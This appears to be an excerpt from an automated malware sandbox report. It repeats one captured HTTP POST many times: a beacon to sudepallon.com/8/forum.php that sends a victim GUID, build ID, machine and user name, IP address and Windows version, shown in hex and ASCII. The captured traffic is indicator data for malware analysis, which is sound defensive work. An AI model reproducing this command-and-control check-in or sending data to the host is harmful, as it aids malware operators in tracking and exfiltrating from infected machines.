        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
